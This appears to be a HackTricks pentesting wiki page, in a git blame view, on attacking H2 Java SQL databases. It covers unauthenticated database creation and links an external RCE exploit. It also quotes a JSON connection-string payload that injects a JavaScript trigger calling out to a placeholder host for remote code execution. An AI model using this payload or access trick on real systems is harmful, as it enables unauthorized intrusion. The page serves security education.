hacktricks/network-services-pentesting/pentesting-web/h2-java-sql-database.md

73 lines
3.8 KiB
Markdown
Raw Normal View History

2022-08-16 09:29:34 +00:00
# H2 - Java SQL database
2022-04-28 16:01:33 +00:00
2024-07-19 09:08:05 +00:00
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
2022-04-28 16:01:33 +00:00
2024-07-19 09:08:05 +00:00
<details>
2022-04-28 16:01:33 +00:00
2024-07-19 09:08:05 +00:00
<summary>Support HackTricks</summary>
2023-12-31 01:24:39 +00:00
2024-07-19 09:08:05 +00:00
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
2022-04-28 16:01:33 +00:00
</details>
2024-07-19 09:08:05 +00:00
{% endhint %}
2022-04-28 16:01:33 +00:00
2024-11-09 12:50:14 +00:00
<figure><img src="/..https:/pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
Official page: [https://www.h2database.com/html/main.html](https://www.h2database.com/html/main.html)
## Access
2021-11-30 16:46:07 +00:00
You can indicate a **non-existent name a of database** in order to **create a new database without valid credentials** (**unauthenticated**):
2024-05-05 17:56:05 +00:00
![](<../../.gitbook/assets/image (131).png>)
2021-11-30 16:46:07 +00:00
Or if you know that for example a **mysql is running** and you know the **database name** and the **credentials** for that database, you can just access it:
2024-05-05 17:56:05 +00:00
![](<../../.gitbook/assets/image (201).png>)
_**Trick from box Hawk of HTB.**_
2022-04-28 16:01:33 +00:00
## **RCE**
2022-08-16 09:29:34 +00:00
Having access to communicate with the H2 database check this exploit to get RCE on it: [https://gist.github.com/h4ckninja/22b8e2d2f4c29e94121718a43ba97eed](https://gist.github.com/h4ckninja/22b8e2d2f4c29e94121718a43ba97eed)
2022-04-28 16:01:33 +00:00
## H2 SQL Injection to RCE
2022-04-28 16:01:33 +00:00
In [**this post**](https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/) a payload is explained to get **RCE via a H2 database** abusing a **SQL Injection**.
2022-04-28 16:01:33 +00:00
```json
[...]
"details":
{
"db": "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER IAMPWNED BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\nnew java.net.URL('https://example.com/pwn134').openConnection().getContentLength()\n$$--=x\\;",
"advanced-options": false,
"ssl": true
},
[...]
```
2022-04-28 16:01:33 +00:00
2024-11-09 12:50:14 +00:00
<figure><img src="/..https:/pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
2024-07-19 09:08:05 +00:00
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
2022-04-28 16:01:33 +00:00
2024-07-19 09:08:05 +00:00
<details>
2022-04-28 16:01:33 +00:00
2024-07-19 09:08:05 +00:00
<summary>Support HackTricks</summary>
2023-12-31 01:24:39 +00:00
2024-07-19 09:08:05 +00:00
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
2022-04-28 16:01:33 +00:00
</details>
2024-07-19 09:08:05 +00:00
{% endhint %}